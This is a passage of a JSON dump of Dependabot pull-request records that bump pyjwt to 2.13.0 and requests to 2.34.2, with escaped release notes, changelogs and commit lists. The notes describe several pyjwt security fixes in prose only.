\u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.34.0 to 2.34.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.34.2\u003c/h2\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues with \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling \u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.1\u003c/h2\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/k223kim\"\u003e\u003ccode\u003e@​k223kim\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/psf/requests/pull/7433\"\u003epsf/requests#7433\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues\nwith \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling\n\u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6e83187b8feb273ed4c6cdab5efd8d54901dfab3\"\u003e\u003ccode\u003e6e83187\u003c/code\u003e\u003c/a\u003e v2.34.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/84d10f0be83e8f6aeca8a05230c52216431c4d0b\"\u003e\u003ccode\u003e84d10f0\u003c/code\u003e\u003c/a\u003e Move Request.headers back to Mapping (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/b7b549b54571d03950b16afd2d01bc6ff0348224\"\u003e\u003ccode\u003eb7b549b\u003c/code\u003e\u003c/a\u003e v2.34.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/e511bc72777a94c45d004e010c597925092e1efe\"\u003e\u003ccode\u003ee511bc7\u003c/code\u003e\u003c/a\u003e Fix mutability issues with headers input types (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5691f596134c2feb121e595c77a0178921fcce61\"\u003e\u003ccode\u003e5691f59\u003c/code\u003e\u003c/a\u003e Update JsonType containers to read-based collections (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/2144213c307691710c9d665700860fc4993c3035\"\u003e\u003ccode\u003e2144213\u003c/code\u003e\u003c/a\u003e Constrain Response.reason to str (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6404f345e562d962abe6700a1c357ec1e7e18232\"\u003e\u003ccode\u003e6404f34\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eprepare_body\u003c/code\u003e stream detection for \u003ccode\u003e__getattr__\u003c/code\u003e-based file wrappers (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7\"\u003e#7\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/psf/requests/compare/v2.34.0...v2.34.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/hyperledger-identus/cloud-agent/pull/1800","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/hyperledger-identus%2Fcloud-agent/issues/1800","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1800/packages"},{"uuid":"4568233803","node_id":"PR_kwDORjwygs7hn52j","number":45,"state":"open","title":"chore(deps): Update pyjwt requirement from \u003e=2.8.0 to \u003e=2.13.0 in /itsm-api","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-02T03:46:26.000Z","updated_at":"2026-06-02T03:46:26.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): Update","packages":[{"name":"pyjwt","old_version":"\u003e=2.8.0","new_version":"\u003e=2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"/itsm-api","ecosystem":"pip"},"body":"Updates the requirements on [pyjwt](https://github.com/jpadilla/pyjwt) to permit the latest version.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 